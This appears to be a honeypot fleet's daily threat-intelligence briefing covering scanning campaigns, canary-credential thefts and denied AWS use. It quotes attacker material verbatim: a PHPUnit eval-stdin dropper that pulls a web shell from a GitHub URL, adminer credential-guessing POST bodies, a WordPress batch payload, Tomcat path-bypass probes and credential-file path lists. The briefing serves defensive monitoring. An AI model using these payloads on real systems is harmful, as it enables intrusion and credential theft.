FLUX FLEET — INTEL BRIEFING №12

Period: 2026-09-06 07:33 – 2026-09-07 07:33 UTC (24h digest window, day 11 of operations)
Sources: 3 honeypot nodes — canary-farm-1 (EU-hot), ai-devbox-1 (EU), control-1 (Middle East)
Confidence: High (direct observation; 11-day baseline, every result-tag spike attributed by spot query)

The digest window starts at the previous digest run time, and the +4 h timestamp cast widens the effective query window to ~03:33 UTC on 09-06. Events from 03:33 to 07:33 UTC on 09-06 appear in both this digest and №11's data. The new data starts at 07:33 UTC on 09-06. All times are UTC and quoted from the raw log timestamps.

BLUF

The fleet recorded its first attributed canary use beyond denial: the METADATA-HUNT GCP runner minted 25 credentials on canary-farm-1 at 05:10 UTC on 09-07 and drove all 34 of this window's AWS uses minutes later — every operation was a denied Bedrock Converse call, so the credential-to-use pipeline now works end-to-end and still yields nothing hostile. CRUSADER-SWEEP completed its third run: the 19-path workers returned at 06:00 UTC on 09-06 (338 aidev IPs, 5,363 events), and a second Firefox/78 fleet of 29 IPs dumped a 1,692-path .git-mirror walk on aidev for 50,112 events with zero mints — that walk alone explains the +317% aidev spike and every fake-git result in the digest. INFOCREST-KIT returned under a third operator IP (31.57.219.158) with a new prod_rw password and minted 4, and WP-LOGIN-BRUTE slowed from 363 pairs to 113. Control had its quietest census day yet (3,256 events, −60%) while still absorbing the AI-credential template as a third operator walked it there.

Key Judgements

  1. The canary funnel reached AWS from a fleet-minted credential, and the credential still bought nothing. The GCP runner 34.83.24.21 minted 25 credentials in 5 seconds on farm (05:10:05–05:10:10 UTC on 09-07, 803 events, 578 paths, 12 POSTs) and Tracebit recorded 34 uses from one use IP — all denied, all Converse (Bedrock chat). The runner repeated the day-10 operator's exact template: same journey, same forged AI-crawler UA set, zero 400s on the mint path. (High confidence — mints and uses both observed, joined on collector IP; the use is one IP, so the credentials stayed in one hand)
  2. CRUSADER-SWEEP split into two tooling classes that behave like one operator's scheduler. Class A: 338 crusader-worker/1.0 IPs ran the 19-path core list on aidev at 06:00–10:02 UTC on 09-06 (5,363 events, 13 mints, the same coordinated hour as №11's wave). Class B: 29 IPs with the stale Firefox/78 UA ran a 1,692-path git-mirror walk (1,740 events each, /.git/HEAD/config/refs plus .gitignore) from 06:04 to 09:10 UTC, zero mints, aidev only. №11's two Firefox/78 IPs became 29; the walk ran alongside the core list in the same hours. (High confidence — the two UAs share GCP hosting, the same hours, and complementary wordlists; 50,112 of aidev's 60,032 events are these two classes)
  3. INFOCREST-KIT's prod_rw fingerprint survives a third operator IP. 31.57.219.158 hit both EU nodes between 13:08 and 13:44 UTC on 09-06: 1,990 events total (aidev 1,342, farm 648), 27 adminer credential POSTs, wp-batch multiplex, /login/ with user=root&pass=wrong, and the adminer body auth%5Bdriver%5D=server&auth%5Bserver%5D=&auth%5Busername%5D=prod_rw&auth%5Bpassword%5D=3HfDPvkdZd-vGFmo_Rm1HQ&auth%5Bdb%5D= — a new rotating 22-char password after №11's 185.141.119.179. The template outlives every operator IP that runs it. (High confidence — body structure, path census, and journey match the registry's INFOCREST-KIT entry; only the password rotated, as it has each run)
  4. The AI-credential template now runs against control from a third GCP IP. 34.106.12.203 walked 93 AI-config paths on control in 0.55 seconds at 07:31 UTC on 09-07: /.aider.env, /.cursor/config.json, /.windsurf/mcp.json, /.continue/config.yaml, /.codeium/settings.json, /litellm_config.yaml, /mcp_config.json, /.python_history, plus claude-credentials, claude-settings, openai-config-flat, gcp-credentials-json, and sql-dump trap families. Zero mints — the fastest census yet found nothing. (High confidence — 93 distinct paths in one sub-second burst, trap families match the aidev AI-surface template; the operator is probing for the fleet's weakest node and control answered with a 404 wall)

Active Campaigns (day 11 status)

Recurring campaigns carry ⟳ and their registry names. First-seen signatures carry ⚠ NEW. Signatures, not IPs, are the campaign identity.

  • Actors: 34.83.24.21 (Google LLC, US) on canary-farm-1: 803 events, 578 paths, 12 POSTs, 25 mints, zero 400s, 05:10:04–05:10:13 UTC on 09-07. Second runner 34.23.20.91 (Google LLC, US) on control-1: 742 events, 570 paths, 12 POSTs, 0 mints, 21 × 400 at the mint path (06:11 UTC on 09-07). Sixth consecutive GCP day: 130.211.73.106, 207.175.90.192 + 34.38.121.96, 34.23.228.150 + 34.79.70.110, 136.85.12.249 + 104.196.118.131, this pair.
  • TTPs: The Vite/IMDS template unchanged: /__aws_leak_probe_7b0ee3a3__, /@fs/proc/self/environ, /@fs/home/ec2-user/.aws/credentials, /.azure/credentials, /.mcp.json, /.env.local. The mint path carried the same forged crawler UA set as day 10 (Claude-User, GPTBot/1.2 and /1.4, Google-Extended, Amazonbot, GrokBot, TelegramBot, Twitterbot, Bytespider, OAI-SearchBot), rotating per request inside the same second.
  • Assessment: This is the fleet's first mint→use attribution against farm. The 25 credentials reached one AWS use IP, which spent all 34 attempts on Bedrock Converse and was denied every time. The operator mints and uses same-minute now — the day-10 "one day later" latency is gone. The control runner's 21 × 400s are the same upstream rejection shape as №11's NIGHTAGENT run, not a key problem. Watch for Converse retries that switch region or model; a sts:GetCallerIdentity success remains the escalation line.

⟳ CRUSADER-SWEEP (serverless credential + git-mirror sweep) — hostile, third run, two worker classes

  • Actors: Class A: 338 crusader-worker/1.0 IPs (GCP 34.x/35.x plus Oracle 8.x) on aidev, 06:00–10:02 UTC on 09-06, 5,363 events, 13 mints, plus 3 control workers (34.106.255.160 and 34.186.198.82, 19-path and 12-path lists; 34.94.14.138 ran the 19-path list again at 07:30 UTC on 09-07 — the run crossed the digest horizon into this window's tail). Class B: 29 Firefox/78 IPs (GCP), aidev only, 06:04–09:10 UTC on 09-06, 1,740 events each, 50,112 total, zero mints, zero 400s.
  • TTPs: Class A ran the unchanged 19-path core list (/.env variants, /actuator/env, /_ignition/health-check, /storage/logs/laravel.log, /wp-config.php.*, /crusader-404-probe). Class B walked the git-mirror list: /.git/HEAD, /.git/index, /.git/config, environment-named refs, and .gitignore under web-root prefixes — 1,692 distinct paths per IP, all GETs, no POSTs. The fake-git (50,140), fake-git-error (1,735), and gitignore (348) result spikes trace entirely to this class.
  • Assessment: The third run inverted №11's ratio: the core list shrank from 444 to 341 IPs while the git-mirror list grew from 2 to 29 IPs. The mirror list produced zero mints and zero credential paths — it is exfiltration staging, not credential theft, and it burned 29 IPs to confirm aidev serves fake git. The 06:00 UTC wave repeated on schedule. The run ended at 10:02 UTC, so this window closed with the campaign idle — first time since day 9.

⟳ INFOCREST-KIT (adminer/phpMyAdmin census) — hostile, third operator IP, new password, 4 mints

  • Actors: 31.57.219.158 (ASN not in the log's table; rDNS absent) on both EU nodes, 13:08–13:44 UTC on 09-06. Aidev 1,342 events / 56 paths / 97 POSTs / 4 mints; farm 648 events / 71 paths / 35 POSTs / 0 mints. 17 rotating UAs on aidev, 15 on farm — stale Chrome/105–107, Firefox/105–106, plus python-requests/2.32.5 for .DS_Store and POST stages.
  • TTPs: Tarpit cycling → .git/config + .git/index.DS_Store → phpMyAdmin spelling census (110 phpmyadmin-login hits on aidev) → adminer POSTs to /adminer.php, /adminer/adminer.php, /admin/adminer.php, body verbatim auth%5Bdriver%5D=server&auth%5Bserver%5D=&auth%5Busername%5D=prod_rw&auth%5Bpassword%5D=3HfDPvkdZd-vGFmo_Rm1HQ&auth%5Bdb%5D=/login/ with user=root&pass=wrong → wp-batch multiplex ({"requests": [{"method": "POST", "path": "///"}, {"method": "POST", "path": "/wp/v2/posts", "body": {"requests": [...]). The aidev adminer-credential-post (30), adminer-login (30), and phpmyadmin-login (141) spikes are 100% this IP plus 45.33.103.103.
  • Assessment: Third IP, third password, same template — prod_rw is now a three-operator lineage (23.165.56.117 → 185.141.119.179 → 31.57.219.158). The kit mints when a node's mint path tolerates its burst shape; it drew 4 from aidev and 0 from farm. The yii2-debug-view, symfony-parameters-yml, and webapp-config-bundle farm spikes all trace to this run's config census.

⚠ AKAMAI-CONFIG (config census, wp-batch, no mints) — hostile, NEW, fleet-wide shape

  • Actors: 45.33.103.103 (Akamai Connected Cloud, US) on both EU nodes, 14:23–14:43 UTC on 09-06. Aidev 428 events / 85 paths / 18 POSTs; farm 419 events / 85 paths / 18 POSTs. Same 85 paths on both nodes, 6 adminer credential POSTs per node, forged Chrome/107 and Chrome/105 UAs.
  • TTPs: Adminer POSTs with a new credential shape: auth%5Bdriver%5D=server&auth%5Bserver%5D=&auth%5Busername%5D=joomla_app&auth%5Bpassword%5D=qgn1AUEujvtg1lsoNswXFQ on farm (and bFzbMn841rtnkUaQddwZBQ on aidev) — joomla_app replaces prod_rw, and the per-node password differs. Config census (.git/config walk, webapp-config-bundle errors), wp-batch multiplex, /..;/ Tomcat path-bypass probes on farm.
  • Assessment: Same POST anatomy as INFOCREST-KIT, different credential names, both EU nodes in 20 minutes, zero mints, zero upstream 400s on the mint path. This is either a fourth INFOCREST operator or the template's next fork; the joomla_app body is the continuity fingerprint to watch. Named AKAMAI-CONFIG this cycle; merge it into INFOCREST-KIT if a shared IP or shared password ever links the two.

⟳ CREDSWEEP family (.env-variant census) — hostile, three operators, one escalation

  • Actors: 45.148.10.238 (Techoff Srv, NL) on aidev (1,311 events, 13:11–13:44 tail of №11's run, 2 mints) then control (1,724 events, 179-path .env census, 20:47–20:52 UTC, 3 mints) — it walked a second node for the first time. 91.245.74.31 (PC Astra-net, UA) moved from aidev to farm: 514 events, 53 paths, 21:30–21:35 UTC on 09-06, 1 mint — fourth consecutive day, now on its third node. 213.209.159.154 (Feo Prest, DE) returned to farm for the third window: 169 events in 3 seconds, stale Opera UA, 1 mint. 176.65.148.71 returned after a one-window gap: 4 aidev events, 1 mint. One-offs: 84.21.173.161 (farm, 48 events, 6 UAs, .env-family census, 2 mints, 22:19–23:13 UTC), 155.117.232.31 (farm, UCBrowser UA, 2 events, 1 mint), 36.255.97.72 (aidev, UCBrowser UA, 2 events, 1 mint), 186.243.178.169 (aidev, axios/1.11.0, 1 event, 1 mint), 185.196.41.22 (control, Go-http-client/1.1, 1 event, 1 mint), 192.253.248.173 (control, 96-path .env census in 12 seconds, returned after a 6-window gap).
  • TTPs: Exhaustive .env-variant and credential-file walks, one mint path each. 45.148.10.238's control run kept its UA rotation including the Mozlila/5.0 typo forgery.
  • Assessment: The census template keeps minting through single-event and single-burst operators — six of this window's minting IPs ran fewer than 10 events. The mint path is the fleet's highest-volume credential surface; the volume floor keeps falling.

⟳ NIGHTAGENT (residential MA) — hostile, №11's run continued into this window's morning

  • Actors: 160.177.242.255 on both EU nodes, 06:19–07:17 UTC on 09-06 — the first hour of №11's run sits in this digest's 03:33 overlap band. Farm 303 events / aidev 315 events, 12 POSTs per node, 0 mints.
  • TTPs: The four-step loop verbatim: phpunit verify, dropper to /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php with body head <?php copy('https://raw.githubusercontent.com/nightagents/nightshell/refs/heads/main/night.php?token=GHSAT0AAAAAACYWDMT5... — the GHSAT token is unrotated across №9–№12's coverage of the kit — then /login/ with user=root&pass=wrong and wp-batch multiplex. All mint attempts 400'd.
  • Assessment: No new NIGHTAGENT run started after 07:17 UTC on 09-06 — the kit's daily cadence broke after three consecutive days. The token and repo remain the search indicator.

⟳ REGISTRY-HUNT (LeakIX) — borderline, wave intact, smaller

  • Actors: 8 l9scan IPs in the evening wave, 20:16–20:36 UTC on 09-06: 64.227.32.66, 64.227.70.2, 159.65.18.197, 139.59.136.184 on farm; 68.183.9.16, 138.197.191.87, 159.89.12.166, 209.97.180.8 on aidev. DigitalOcean rotating IPs, 41 events each, 1 mint each (8 total).
  • TTPs: The fixed WebLogic → Confluence → WHM → Docker-registry journey, unchanged, 41 steps per IP.
  • Assessment: Tenth consecutive day at the same hour, same scale. The 8 fresh mints keep LeakIX a collector, not a researcher.

⟳ WP-LOGIN-BRUTE (distributed credential brute) — hostile, slowed but continuous

  • Actors: 87 IPs (67 farm / 30 aidev, overlapping), 113 credential POSTs, spread 05:00 UTC on 09-06 through 07:00 UTC on 09-07. Forged browser UAs.
  • TTPs: One probe, then 1–3 credential POSTs per IP. 113 distinct bodies in 113 POSTs. The pair corpus keeps its node-aware shape (sso… on farm, inference… on aidev).
  • Assessment: Volume fell from 363 to 113 pairs and the continuous-trickle shape holds. No mints. The brute is background noise now; a growth alarm needs a threshold, not a recount.

⟳ ORACLE-SWEEP (.env/phpinfo census) — hostile, second run on control only

  • Actors: 161.118.243.214 (Oracle Corporation, SG) on control, 06:08 UTC on 09-07: 128 events, 117 paths, 1 mint, 6-second run. 168.107.91.14 (Oracle Corporation, SG) on control, 07:27 UTC: 60 events, 51 paths, 1 mint, 15-second run.
  • TTPs: Forged Chrome/126.0.0.0 Windows UA. The №11 journey verbatim: tarpit entry → .env-variant walk → .DS_Store.git/config and .git/HEADphpinfo.php → robots/sitemap → wp-login probe.
  • Assessment: A second run confirms a standing operator. Both new IPs are control-only and the 117-path list returned intact — the farm/aidev legs did not rerun this window. The aws-credentials-file-error (20.7×) and env-production-error (3.5×) control spikes trace to these two plus the CREDSWEEP operators.

⟳ OMEGA-SWEEP (Omegatech /24) — hostile, second census day on the /46 block, hoard unchanged

  • Actors: 94.154.46.247 (Omegatech LTD, US) on farm: 2,100 events in one minute (19:02 UTC on 09-06), 107 trap families, 1,042 paths, 12 mints, forged Googlebot UA — the largest single-IP census in fleet history. Pool probes: 94.154.43.122 (farm) and 94.154.43.158 (aidev), one /.env event each, 1 mint each at 17:51 UTC on 09-06.
  • TTPs: The 107-family census: WordPress config variants (.bak, .old, .save, ~), .git internals, docker-compose.yml, composer.lock, app-config PHP walks — all under Mozilla/5.0 (compatible; Googlebot/2.1). The mint burst drew 12 in 12 seconds.
  • Assessment: The .243 hoard (71 canaries, 6 days, zero AWS use) is unchanged. The 12 fresh mints on .247 make the /46 block the fleet's most productive hostile IP range. The .43.x pool probe list grew to 17 known IPs.

⚠ GCP-ACONF (AI-credential census on control) — hostile, NEW, third GCP template operator this week

  • Actors: 34.106.12.203 (Google LLC) on control-1, 07:31:02 UTC on 09-07 — the last second of the digest window. 93 events, 93 paths, zero mints, Chrome/124 UA.
  • TTPs: AI/LLM config census: /.aider.env, /.aider.model.settings.yml, /.cursor/config.json, /.windsurf/mcp.json, /.continue/config.yaml, /.codeium/settings.json, /litellm_config.yaml, /proxy_config.yaml, /mcp_config.json, /.vscode/mcp.json, /.python_history, /.zprofile, /.config/fish/config.fish, /llm_config.json, /google.json, /data.sql, /web.zip, /public_html.zip. Trap families hit: claude-credentials, claude-settings, anthropic-config-flat, openai-config-flat, ai-ide-rules, litellm-config, mcp-config, cursor-mcp, continue-config, aider-conf, gcp-credentials-json, aws-credentials-json, sql-dump, backup-archive, shell-rc, zsh-history, firebase-json.
  • Assessment: The aidev AI-surface template ran on control for the first time, in 0.55 seconds. Control's certless baseline found nothing and minted nothing. All 20 first-seen control paths are this run. The run differs from METADATA-HUNT in every observable: no IMDS or Vite paths, no forged crawler UAs, one tenth the path count. Treat it as a separate template lineage that now probes the fleet's weakest node.

Standing actors (persistence check)

  • 91.245.74.31 (PC Astra-net, UA) — fourth consecutive day, third node: aidev (№11 census), farm this window (514 events, 1 mint). 7 all-time mints. It walked a second node, so it graduates from standing actor to a named campaign at the next farm census. Volume trend: up, node count: up.
  • 45.148.10.238 (Techoff Srv, NL) — second consecutive window, third node: aidev then control (1,724 events). 8 all-time mints. The 10-UA rotation including the Mozlila/5.0 typo forgery is its fingerprint.
  • 80.94.95.211 (SS-Net, RO) — fourth appearance in five windows: aidev 342 events, 2 mints, 8 all-time mints. MSIE 9 and Mail.RU_Bot UAs.
  • 16.5.0.236 (Hello World UA) — SOHO-router probes continue on all 3 nodes (34 events), unchanged.
  • 89.42.231.200 (Go-http-client) — OpenWrt diagnostic probes on all 3 nodes, 3 events, shallow, no mints. IoT-botnet check shape; benign-shape, watch.
  • 80.82.77.202 / 93.174.93.12 — the fixed-cadence /-handshake pair, unchanged (135 and 4 events).
  • 89.248.171.24 / 89.248.172.14 — new Recursor-style pair: 72 aiohttp events on 89.248.171.24 spread across all 3 nodes over 4 hours, /-only; 89.248.172.14 logged one Exabot-UA farm event. Benign-shape uptime probers, report only.
  • 213.209.159.154 (Feo Prest, DE) — third window in a row on farm: 169 events in 3 seconds, 1 mint.
  • 192.253.248.173 (Limited Network, NL) — returned after a 6-window gap: 96-path .env census on control in 12 seconds, 0 mints.
  • Absent this window: 194.180.49.37 (MEVSPACE, second window absent); 91.92.241.215 (audit-site, second window absent); 176.65.148.226; 195.178.110.132 (Techoff); the Hetzner IPv6 git walker; 196.251.122.4 / 65.2.142.242 (ArgusScanner).

Benign / research (not hostile)

  • Exabot (89.248.172.14) — 1 farm event, /-only, honest UA.
  • Censys / Palo Alto / zgrab / OAI-SearchBot / ModatScanner / ivre-masscan — no hostile journeys this window. The OAI-SearchBot UA string appeared inside METADATA-HUNT's forged rotation on farm; the registry's benign OAI-SearchBot entry covers honest standalone visits, which did not occur this window.

Canary credentials

Summary

34 Tracebit alert(s) fired in the window (35 use events across 34 credentials). Fleet sensors minted 74 credentials to 29 collector IPs; 34 credential(s) reached AWS. Use outcomes: 35 failure. Denied operations: Converse×35. 0 call(s) succeeded: . Successes leak identity at most; treat any success beyond sts:GetCallerIdentity as a finding.

Mint → use funnel

Metric Count
Credentials minted (fleet, window) 74
Distinct collector IPs 29
Credentials used in AWS (alerts) 34
Credentials stolen, no observed AWS use in window 40

Per collector (evidence for attribution prose — join each IP against ip-journey and the campaign registry):

Theft IP Sensor Mints (window) Creds used in AWS Use IPs Operations Mint history (6d)
34.83.24.21 canary-farm-1 25 34 1 Converse 25 mints since 2026-09-07 05:10
94.154.46.247 canary-farm-1 12 0 0 18 mints since 2026-09-03 17:01
31.57.219.158 ai-devbox-1 4 0 0 4 mints since 2026-09-06 13:11
45.148.10.238 control-1 3 0 0 8 mints since 2026-09-03 13:30
45.148.10.238 ai-devbox-1 2 0 0 8 mints since 2026-09-03 13:30
80.94.95.211 ai-devbox-1 2 0 0 8 mints since 2026-08-31 03:45
84.21.173.161 canary-farm-1 2 0 0 2 mints since 2026-09-06 22:19
129.213.151.234 canary-farm-1 1 0 0 2 mints since 2026-09-01 07:58
138.197.191.87 ai-devbox-1 1 0 0 3 mints since 2026-08-31 20:41
139.59.136.184 canary-farm-1 1 0 0 4 mints since 2026-08-31 20:31
155.117.232.31 canary-farm-1 1 0 0 1 mints since 2026-09-06 21:22
159.65.18.197 canary-farm-1 1 0 0 1 mints since 2026-09-06 20:35
159.89.12.166 ai-devbox-1 1 0 0 2 mints since 2026-09-02 15:13
161.118.243.214 control-1 1 0 0 1 mints since 2026-09-07 06:08
168.107.91.14 control-1 1 0 0 1 mints since 2026-09-07 07:27
176.65.148.71 ai-devbox-1 1 0 0 2 mints since 2026-09-03 15:50
182.8.227.195 ai-devbox-1 1 0 0 6 mints since 2026-08-31 20:48
182.8.227.195 canary-farm-1 1 0 0 6 mints since 2026-08-31 20:48
185.196.41.22 control-1 1 0 0 2 mints since 2026-08-31 23:18
186.243.178.169 ai-devbox-1 1 0 0 1 mints since 2026-09-06 15:34
209.97.180.8 ai-devbox-1 1 0 0 2 mints since 2026-09-05 20:42
34.181.142.61 ai-devbox-1 1 0 0 1 mints since 2026-09-06 16:43
34.94.14.138 control-1 1 0 0 1 mints since 2026-09-07 07:30
36.255.97.72 ai-devbox-1 1 0 0 1 mints since 2026-09-07 07:07
64.227.32.66 canary-farm-1 1 0 0 2 mints since 2026-09-01 20:11
64.227.70.2 canary-farm-1 1 0 0 2 mints since 2026-08-31 20:34
65.0.75.227 ai-devbox-1 1 0 0 1 mints since 2026-09-06 21:29
68.183.9.16 ai-devbox-1 1 0 0 2 mints since 2026-09-02 20:10
91.245.74.31 canary-farm-1 1 0 0 7 mints since 2026-09-04 10:52
94.154.43.122 canary-farm-1 1 0 0 1 mints since 2026-09-06 17:51
94.154.43.158 ai-devbox-1 1 0 0 2 mints since 2026-09-01 13:13

Persistent collectors with no observed AWS use (candidates for hoard/resale/untraced use — check prior briefings for named campaigns):

  • 94.154.46.243: 71 mints, 2026-09-01 12:13 → 2026-09-04 03:42
  • 104.196.118.131: 25 mints, 2026-09-06 03:25 → 2026-09-06 03:25
  • 194.180.49.37: 18 mints, 2026-08-31 07:18 → 2026-09-04 17:18
  • 94.154.46.247: 18 mints, 2026-09-03 17:01 → 2026-09-06 19:02
  • 207.175.90.192: 13 mints, 2026-09-03 07:50 → 2026-09-03 07:50
  • 34.38.121.96: 13 mints, 2026-09-03 09:30 → 2026-09-03 09:30
  • 34.74.98.8: 13 mints, 2026-09-01 09:19 → 2026-09-01 09:19
  • 196.206.35.222: 12 mints, 2026-09-04 04:09 → 2026-09-04 08:26
  • 94.154.46.244: 12 mints, 2026-09-03 11:42 → 2026-09-03 11:42
  • 94.154.46.249: 12 mints, 2026-09-02 13:07 → 2026-09-02 13:08
  • 34.23.228.150: 11 mints, 2026-09-04 21:35 → 2026-09-04 21:35
  • 87.120.104.29: 11 mints, 2026-09-04 05:06 → 2026-09-04 05:06
  • 93.152.223.194: 11 mints, 2026-08-31 10:10 → 2026-08-31 20:34
  • 94.154.46.248: 10 mints, 2026-09-02 12:43 → 2026-09-02 12:43
  • 136.85.12.249: 8 mints, 2026-09-05 09:28 → 2026-09-05 09:28
  • 45.148.10.238: 8 mints, 2026-09-03 13:30 → 2026-09-06 20:48
  • 80.94.95.211: 8 mints, 2026-08-31 03:45 → 2026-09-07 01:57
  • 91.245.74.31: 7 mints, 2026-09-04 10:52 → 2026-09-06 21:30
  • 182.8.227.195: 6 mints, 2026-08-31 20:48 → 2026-09-06 23:30
  • 196.77.107.174: 6 mints, 2026-08-31 22:55 → 2026-08-31 23:24
  • 23.165.56.117: 6 mints, 2026-09-02 22:58 → 2026-09-03 05:15
  • 41.142.109.20: 6 mints, 2026-09-05 05:09 → 2026-09-05 05:47
  • 72.167.41.202: 6 mints, 2026-09-04 18:22 → 2026-09-04 18:22
  • 139.59.136.184: 4 mints, 2026-08-31 20:31 → 2026-09-06 20:35
  • 167.71.175.236: 4 mints, 2026-08-31 20:36 → 2026-09-05 20:38
  • 167.99.182.39: 4 mints, 2026-09-01 20:50 → 2026-09-05 20:41
  • 185.141.119.179: 4 mints, 2026-09-05 10:17 → 2026-09-05 10:26
  • 31.57.219.158: 4 mints, 2026-09-06 13:11 → 2026-09-06 13:23
  • 81.172.241.94: 4 mints, 2026-08-31 07:20 → 2026-08-31 08:11
  • 94.154.46.250: 4 mints, 2026-09-01 15:55 → 2026-09-01 15:56
  • 130.12.180.77: 3 mints, 2026-09-02 00:04 → 2026-09-02 00:07
  • 138.197.191.87: 3 mints, 2026-08-31 20:41 → 2026-09-06 20:30
  • 164.92.107.174: 3 mints, 2026-09-03 20:39 → 2026-09-05 20:23
  • 165.227.39.235: 3 mints, 2026-08-31 20:17 → 2026-09-02 19:34
  • 185.177.72.53: 3 mints, 2026-09-03 03:26 → 2026-09-03 03:26
  • 213.209.159.154: 3 mints, 2026-09-01 09:55 → 2026-09-06 05:52
  • 91.92.241.215: 3 mints, 2026-09-04 01:31 → 2026-09-04 08:15
  • 91.92.41.55: 3 mints, 2026-09-01 07:53 → 2026-09-02 14:41

Canary-use attribution (briefing prose)

The first fleet-minted credential reached AWS and every call failed: 34.83.24.21's 25 farm credentials drew 34 Converse attempts from one use IP, all denied. The operator used them minutes after minting, so METADATA-HUNT's day-10 hold pattern is over — the pipeline is live and the policy wall holds. The remaining 40 window credentials are inventory: the crusader pool holds 13, the INFOCREST and CREDSWEEP operators hold most of the rest, and OMEGA-SWEEP's 94.154.46.247 added 12 to the /46 block's 89 unused canaries. The .243 hoard (71) and 104.196.118.131's day-10 haul (25) both sit untouched at 6 and 1 day old respectively.

Fleet Observations

  • Canary economics: Digest-window mints 88 (farm 49 / aidev 32 / control 7), all ["aws"]; the true new window holds 74 to 29 collectors — the difference is №11's tail in the 03:33–07:33 overlap band (NIGHTAGENT's 160.177.242.255, the INFOCREST aidev run, crusader's early workers). All-time: 632 credentials to 202 collector IPs. Mint failures: 227 × 400 (aidev 187, farm 24, control 16), zero 401s. Root cause unchanged: upstream rejection of rapid-retry request shapes (31.57.219.158: 22; 160.177.242.255: 12; 45.33.103.103: 12; 34.23.20.91: 21), not key state.
  • XFF forgery: 0 multi-entry chains, 0 empty-clientIp rows — tenth consecutive clean day post-fix. 2,393 requests carried single-entry XFF.
  • TLS/attribution posture: The Contabo rDNS Host vmi3177282.contaboserver.net carried 55,446 aidev events (the crusader classes resolve rDNS), against 1,767 for inference.fapthropic.com. Farm: sso.rightabouteverything.show 1,816 events, 1,216 https. Control deliberately certless (0 https events). Both EU TLS identities stay under active attack in credential fields.
  • Volume: Digest window 70,239 events (farm 6,439 +1% / aidev 60,032 +317% / control 3,256 −60%). Aidev: crusader classes 55,475 (92%), INFOCREST 1,342, 45.148.10.238 1,311. Farm: OMEGA census 2,100, wp-login ~834, INFOCREST 648, METADATA-HUNT 803. Control: 45.148.10.238 1,724, GCP runner 742, Oracle pair 188, crusader 50 — quietest control day since day 2. Every ≥50-event hour attributed: aidev 06:00–09:00 UTC on 09-06 (56,503 events) = the crusader classes; aidev 13:00 (1,589) = 31.57.219.158 and №11's overlap tail; farm 19:00 (2,102) = the OMEGA census; control 06:00–07:00 on 09-07 (1,099) = the METADATA-HUNT control runner and the Oracle censuses.
  • Control discovery velocity: Day-11 ramp reads 39 → 70 → 88 → 107 → 105 → 105 → 100 → 98 → 99 → 108. Unique IPs held at 108 on 3,256 events. The plateau is a steady state, not a volume artifact: fewer events, more distinct visitors. The differential dataset continues.
  • First-seen inventory (not a timeline): All 20 control first-seen paths are the GCP-ACONF AI-config census (/.aider.env, /.windsurf/mcp.json, /litellm_config.yaml, /.continue/config.yaml, and 16 more). New UAs: the Exabot banner probe (1 farm event), the UCBrowser string on the aidev one-off (the farm variant ran №11), and the fresh Firefox/Chrome strings inside the census operators' rotations. Nothing else new — no new tooling family entered the fleet.
  • Digest quirks (all re-confirmed this run): control-byte-stripped copy needed for UTF-8 reads; +4 h timestamp cast (spot queries default to the digest window and the overlap band was cross-checked against №11 before counting); single-writer DuckDB lock (all spot queries run sequentially); sync-arrival first-seen stamps; window overlap with №11 cross-checked — NIGHTAGENT's full run, the INFOCREST aidev leg, and 45.148.10.238's aidev census all started in №11's window.
  • Infrastructure: no fleet-side changes this cycle.

Gaps / Next Collection

  1. GCP-ACONF second run — the AI-config census hit control once, in 0.55 seconds, at the window's last second. Check whether aidev receives the same 93-path list and whether a farm run follows; a fleet-wide sweep makes it a fourth standing GCP template beside METADATA-HUNT.
  2. AKAMAI-CONFIG vs INFOCREST-KIT — two adminer-credential POST shapes (prod_rw and joomla_app) ran 70 minutes apart on the same nodes. Compare the 85-path and 56-path censuses path-by-path next cycle; a shared path beyond the adminer trio merges the two into one template lineage.
  3. 94.154.46.247's 12-mint census and the /46 block — the largest single-IP census in fleet history came from a block that already holds the 71-canary hoard. Watch Tracebit for first use from any 94.154.46.x-collected credential; the block's 89 unused canaries are the fleet's biggest hostile inventory.
  4. Crusader git-mirror class — 29 IPs, 50,112 events, zero mints, zero credential paths. If the class returns with POST capability, it moves from exfiltration staging to active theft; the current run only confirmed aidev serves fake git.
  5. NIGHTAGENT cadence break — no run started after 07:17 UTC on 09-06, breaking a three-day streak. Re-check the nightagents/nightshell repo visibility and the GHSAT token; a dead token retires the search indicator.
  6. 91.245.74.31 promotion threshold — fourth day, third node, 7 all-time mints. One more node census promotes it to a named campaign; set the trigger on any single-day event count above 500 on a second node.

Generated on medina (headless systemd run). Digest: /data/flux-logs/reports/flux-digest-2026-09-07.md. Spot queries: flux-query.sh fleet-24h, crossnode-reuse, mint-health, mint-collectors, plus 16 ad-hoc v_full queries (INFOCREST body corpus, crusader class split, GCP runner mint path and 400s, OMEGA census profile, Oracle pair, CREDSWEEP operator roster, standing-actor and benign checks) and the Tracebit canary-section generator.